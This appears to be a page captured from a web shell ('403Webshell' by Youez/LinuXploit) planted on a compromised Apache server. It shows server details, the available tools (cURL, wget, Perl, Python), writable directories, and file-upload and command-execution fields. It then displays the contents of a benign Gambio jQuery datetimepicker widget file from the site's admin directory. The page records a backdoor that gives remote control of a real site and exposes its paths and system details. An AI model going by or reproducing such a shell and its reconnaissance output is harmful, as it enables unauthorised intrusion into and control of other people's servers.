403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/admin/javascript/engine/widgets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/admin/javascript/engine/widgets//datetimepicker.js
/* --------------------------------------------------------------
 datetimepicker.js 2016-02-23
 Gambio GmbH
 http://www.gambio.de
 Copyright (c) 2016 Gambio GmbH
 Released under the GNU General Public License (Version 2)
 [http://www.gnu.org/licenses/gpl-2.0.html]
 --------------------------------------------------------------
 */

/**
 * ## Datetimepicker Widget
 *
 * This widget will convert itself or multiple elements into datetimepicker instances. Check the defaults object for a
 * list of available options.
 *
 * You can also set this module in a container element and provide the "data-datetimepicker-container" attribute and
 * this plugin will initialize all the child elements that have the "datetimepicker" class into datetimepicker widgets.
 *
 * jQuery Datetimepicker Website: {@link http://xdsoft.net/jqplugins/datetimepicker}
 *
 * ### Options
 *
 * In addition to the options stated below, you could also add many more options shown in the
 * jQuery Datetimepicker documentation.
 *
 * **Format | `data-datetimepicker-format` | String | Optional**
 *
 * Provide the default date format. If no value is provided, the default format will be set
 * to `'d.m.Y H:i'`.
 *
 * **Lang | `data-datetimepicker-lang` | String | Optional**
 *
 * Provide the default language code. If the current language is set to english, the default
 * language code will be set to `'en-GB'`, else the language code will be set to `'de'`.
 *
 * ### Examples
 *
 * ```html
 * <input type="text" placeholder="##.##.#### ##:##" data-gx-widget="datetimepicker" />
 * ```
 *
 * @deprecated Since v1.4, will be removed in v1.7. Use the one from JSE/Widgets namespace.
 *
 * @module Admin/Widgets/datetimepicker
 * @requires jQuery-Datetimepicker-Plugin
 */
gx.widgets.module(
    'datetimepicker',

    [`${jse.source}/vendor/datetimepicker/jquery.datetimepicker.full.min.js`,
        `${jse.source}/vendor/datetimepicker/jquery.datetimepicker.css`],

    function (data) {

        'use strict';

        var
            /**
             * Module Selector
             *
             * @type {object}
             */
            $this = $(this),

            /**
             * Default Module Options
             *
             * @type {object}
             */
            defaults = {
                format: 'd.m.Y H:i',
                lang: jse.core.config.get('languageCode') === 'en' ? 'en-GB' : 'de'
            },

            /**
             * Final Module Options
             *
             * @type {object}
             */
            options = $.extend(true, {}, defaults, data),

            /**
             * Module Instance
             *
             * @type {object}
             */
            module = {};

        /**
         * Initialize Module
         *
         * @param {function} done Call this method once the module is initialized.
         */
        module.init = function (done) {
            // Check if the datetimepicker plugin is already loaded.
            if ($.fn.datetimepicker === undefined) {
                throw new Error('The $.fn.datetimepicker plugin must be loaded before the module is initialized.');
            }

            // Check if the current element is a container and thus need to initialize the children elements.
            if (options.container !== undefined) {
                $this.find('.datetimepicker').datetimepicker(options);
            } else {
                $this.datetimepicker(options);
            }

            done();
        };

        return module;
    });

Youez - 2016 - github.com/yon3zu
LinuXploit